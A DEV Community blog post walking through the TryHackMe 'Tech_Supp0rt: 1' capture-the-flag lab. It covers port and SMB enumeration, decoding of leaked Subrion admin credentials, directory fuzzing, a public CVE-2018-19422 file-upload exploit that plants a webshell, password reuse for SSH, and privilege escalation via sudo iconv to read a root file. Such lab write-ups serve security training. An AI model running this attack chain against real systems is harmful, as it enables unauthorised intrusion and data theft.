DEV Community

Cover image for TryHackMe Tech_Supp0rt: 1 Walkthrough
Krishna
Krishna

Posted on

1

TryHackMe Tech_Supp0rt: 1 Walkthrough

TryHackMe Page for the Machine => https://tryhackme.com/room/techsupp0rt1

Enum

rustscan nmap

rustscan -a 10.10.26.146 -- -A

PORT    STATE SERVICE     REASON  VERSION
22/tcp  open  ssh         syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtST3F95eem6k4V02TcUi7/Qtn3WvJGNfqpbE+7EVuN2etoFpihgP5LFK2i/EDbeIAiEPALjtKy3gFMEJ5QDCkglBYt3gUbYv29TQBdx+LZQ8Kjry7W+KCKXhkKJEVnkT5cN6lYZIGAkIAVXacZ/YxWjj+ruSAx07fnNLMkqsMR9VA+8w0L2BsXhzYAwCdWrfRf8CE1UEdJy6WIxRsxIYOk25o9R44KXOWT2F8pP2tFbNcvUMlUY6jGHmXgrIEwDiBHuwd3uG5cVVmxJCCSY6Ygr9Aa12nXmUE5QJE9lisYIPUn9IjbRFb2d2hZE2jQHq3WCGdAls2Bwnn7Rgc7J09
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBClT+wif/EERxNcaeTiny8IrQ5Qn6uEM7QxRlouee7KWHrHXomCB/Bq4gJ95Lx5sRPQJhGOZMLZyQaKPTIaILNQ=
|   256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDolvqv0mvkrpBMhzpvuXHjJlRv/vpYhMabXxhkBxOwz
80/tcp  open  http        syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h49m59s, deviation: 3h10m30s, median: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 18468/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 42676/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 46039/udp): CLEAN (Timeout)
|   Check 4 (port 2861/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2022-11-04T17:24:12+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-11-04T11:54:12
|_  start_date: N/A

Enter fullscreen mode Exit fullscreen mode

SMB Server Enum

└─$ crackmapexec smb techsupport.thm -u '' -p '' 
SMB         techsupport.thm 445    TECHSUPPORT      [*] Windows 6.1 (name:TECHSUPPORT) (domain:) (signing:False) (SMBv1:True)
SMB         techsupport.thm 445    TECHSUPPORT      [+] \: 


└─$ crackmapexec smb techsupport.thm -u 'a' -p '' --shares
SMB         techsupport.thm 445    TECHSUPPORT      [*] Windows 6.1 (name:TECHSUPPORT) (domain:) (signing:False) (SMBv1:True)
SMB         techsupport.thm 445    TECHSUPPORT      [+] \a: 
SMB         techsupport.thm 445    TECHSUPPORT      [+] Enumerated shares
SMB         techsupport.thm 445    TECHSUPPORT      Share           Permissions     Remark
SMB         techsupport.thm 445    TECHSUPPORT      -----           -----------     ------
SMB         techsupport.thm 445    TECHSUPPORT      print$                          Printer Drivers
SMB         techsupport.thm 445    TECHSUPPORT      websvr          READ            
SMB         techsupport.thm 445    TECHSUPPORT      IPC$                            IPC Service (TechSupport server (Samba, Ubuntu))

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_techsupport]
└─$ smbclient //techsupport.thm/websvr   
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> PROMPT OFF
smb: \> RECURSE ON
smb: \> mget *
getting file \enter.txt of size 273 as enter.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_techsupport]
└─$ ll    
total 4
-rw-r--r-- 1 kali kali 273 Nov  4 08:58 enter.txt

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_techsupport]
└─$ cat enter.txt                                         
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->
Enter fullscreen mode Exit fullscreen mode

Trying to access this /subrion folder. Did not work in the browser. So tried accessing it via curl

└─$ curl -v http://techsupport.thm/subrion/
*   Trying 10.10.26.146:80...
* Connected to techsupport.thm (10.10.26.146) port 80 (#0)
> GET /subrion/ HTTP/1.1
> Host: techsupport.thm
> User-Agent: curl/7.85.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 04 Nov 2022 13:04:03 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: INTELLI_06c8042c3d=0knjt7oo4bvcpfd14hns363f0i; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Set-Cookie: INTELLI_06c8042c3d=0knjt7oo4bvcpfd14hns363f0i; expires=Fri, 04-Nov-2022 13:34:03 GMT; Max-Age=1800; path=/
< Location: http://10.0.2.15/subrion/subrion/
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host techsupport.thm left intact

Enter fullscreen mode Exit fullscreen mode

No wonder its not working. There is a 302 redirect to a strange IP. Also a strange cookie value.

The enter.txt mentions a panel, which I am guessing is some kind of CMS admin panel.

Let's try and find it. Modifying my usual ffuf statement to remove the -r option to ensure redirects are not followed. Also filtering for 302 status codes. Regarding the 302, the server seems to be configured to return a 302 redirect to 10.0.2.15, when we try to access a subfolder of subrion, which will make fuzzing a pain in the behind if we dont handle it properly.

Example

└─$ curl -v http://techsupport.thm/subrion/whatintheworld/
*   Trying 10.10.26.146:80...
* Connected to techsupport.thm (10.10.26.146) port 80 (#0)
> GET /subrion/whatintheworld/ HTTP/1.1
> Host: techsupport.thm
> User-Agent: curl/7.85.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 04 Nov 2022 13:21:48 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: INTELLI_06c8042c3d=0e7gu6bkk63fuvtkv8t5rfk5sr; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Set-Cookie: INTELLI_06c8042c3d=0e7gu6bkk63fuvtkv8t5rfk5sr; expires=Fri, 04-Nov-2022 13:51:48 GMT; Max-Age=1800; path=/
< Location: http://10.0.2.15/subrion/subrion/whatintheworld/
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host techsupport.thm left intact

Enter fullscreen mode Exit fullscreen mode

Note: Also removed the -recursion option. There is a / after FUZZ. If we don't add this, the server returns a 301 with the slash added. But for the recursion option to work, the FUZZ keyword needs to be the last thing on the URL string.

Now, let's fuzz!

└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u http://techsupport.thm/subrion/FUZZ/ -o ffuf/raftLarge -of html -ic -c -e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz -sf -t 50 -fc 302 

install                 [Status: 200, Size: 13125, Words: 6273, Lines: 212, Duration: 311ms]
updates                 [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 196ms]
panel.php               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel.sql               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel.bak               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel.db                [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel                   [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.html              [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.zip               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.txt               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.gz                [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 794ms]

Enter fullscreen mode Exit fullscreen mode

Trying to decode password in Cyberchef.
https://gchq.github.io/CyberChef/#recipe=From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)From_Base32('A-Z2-7%3D',false)From_Base64('A-Za-z0-9%2B/%3D',true,false)

Subrion login creds
| user | pass |
| -- | -- |
| admin | CENSORED |

Subrion Admin Portal Enum

After login.

Image description

Subrion Version 4.2.1 is installed. Searching for anything regarding this version on ExploitDB, we get https://www.exploit-db.com/exploits/49876. An arbitrary file upload exploit.

Let's try and use it.

Uploading a reverse shell using CVE-2018-19422

Don't forget to add the slash after panel in the URL when running the exploit.

└─$ python3 49876.py -u http://techsupport.thm/subrion/panel/ --user=admin --passw=CENSORED
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

[+] Trying to connect to: http://techsupport.thm/subrion/panel/
[+] Success!
[+] Got CSRF token: 7LJC4WPSmVW99qpA8XKWZZPAUDIcilg43wfRfpQi
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: ipmrjrdahkbtipn

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://techsupport.thm/subrion/panel/uploads/ipmrjrdahkbtipn.phar 

$ 

Enter fullscreen mode Exit fullscreen mode

The above exploit gives us a command shell. Let's pivot to a full featured reverse shell by running a Python3 reverse shell command.
Here are some good examples => https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python

With this shell, we can get a foothold on the machine.

Foothold

wp-config.php

/** The name of the database for WordPress */
define( 'DB_NAME', 'wpdb' );

/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', 'CENSORED' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );


Enter fullscreen mode Exit fullscreen mode

Trying to do an SSH login to the scamsite user(which we found in the home folder) using the above password?

Success!! We now have a proper login shell.

Let's try for privesc

Privesc

scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv
Enter fullscreen mode Exit fullscreen mode

Looks like we have sudo permissions for one command. Let's see if we can leverage that for privesc.

Yes we can => https://gtfobins.github.io/gtfobins/iconv/#sudo

scamsite@TechSupport:~$ sudo /usr/bin/iconv 8859_1 -t 8859_1 /root/root.txt
/usr/bin/iconv: cannot open input file `8859_1': No such file or directory
CENSORED  -

Enter fullscreen mode Exit fullscreen mode

DONE!!

Also follow me on Mastodon.

Do your career a big favor. Join DEV. (The website you're on right now)

It takes one minute, it's free, and is worth it for your career.

Get started

Community matters

Top comments (0)

A Workflow Copilot. Tailored to You.

Pieces.app image

Our desktop app, with its intelligent copilot, streamlines coding by generating snippets, extracting code from screenshots, and accelerating problem-solving.

Read the docs

👋 Kindness is contagious

Discover a treasure trove of wisdom within this insightful piece, highly respected in the nurturing DEV Community enviroment. Developers, whether novice or expert, are encouraged to participate and add to our shared knowledge basin.

A simple "thank you" can illuminate someone's day. Express your appreciation in the comments section!

On DEV, sharing ideas smoothens our journey and strengthens our community ties. Learn something useful? Offering a quick thanks to the author is deeply appreciated.

Okay